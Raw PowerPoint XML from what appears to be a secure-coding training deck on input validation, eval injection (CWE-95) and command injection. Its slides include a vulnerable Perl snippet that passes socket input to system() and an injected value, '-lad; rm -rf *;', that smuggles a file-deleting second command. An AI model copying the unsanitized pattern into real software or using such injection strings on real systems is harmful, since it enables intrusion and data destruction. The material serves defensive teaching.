                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data Validation Core Concepts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="1295399"/>
            <a:ext cx="7276351" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Given that the client can bypass any client-side controls, all data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>collected from the client must be considered suspect.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="399728" y="3577117"/>
            <a:ext cx="5105400" cy="1759456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Known Good Exact Match (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Whitelisting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Known Good Characters (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Whitelisting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Known Bad Characters (Blacklisting)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Known Bad Exact Match (Blacklisting)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323528" y="2438399"/>
            <a:ext cx="6699270" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Is the data of a proper length and well formed for what was </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>expected by the application?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9510" y="402130"/>
            <a:ext cx="8018874"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Data Validation Words to Live By: #3</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Horizontal Scroll 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="107504" y="922175"/>
            <a:ext cx="69342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Validate data before use in ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’ or system commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1946269"/>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CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Injection’)</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The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before using the input in a dynamic evaluation call (e.g. "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"). </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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116401" y="1224706"/>
            <a:ext cx="8153400" cy="1846053"/>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  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>my</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> $options = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>readSocket</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>($sock);</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>2  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>my</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> $command = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"/bin/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ls</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> " </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>. $options;</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>3  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>system</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>($command);</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Straight Connector 8"/>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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="130346" y="2852936"/>
            <a:ext cx="7924800" cy="33607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r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-lad</a:t>
            </a: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r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /bin/ls -lad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49"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116401" y="1224706"/>
            <a:ext cx="8153400" cy="1846053"/>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  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>my</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> $options = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>readSocket</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>($sock);</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>2  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>my</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> $command = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"/bin/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ls</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> " </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>. $options;</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>3  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="C00000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>system</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>($command);</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Straight Connector 8"/>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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="130346" y="2852936"/>
            <a:ext cx="7924800" cy="33607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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-lad; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rm</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rf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *;</a:t>
            </a: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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /bin/ls -lad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="243269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5867"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err="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Injection – Exploit Demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5435607" y="4648200"/>
            <a:ext cx="1609725" cy="1609725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5083695" y="2057400"/>
            <a:ext cx="3657600" cy="700216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5740407" y="1066800"/>
            <a:ext cx="1043876" cy="385362"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Fuzzing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Down Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5969007" y="1524000"/>
            <a:ext cx="484632" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>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rgbClr val="0810B8"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
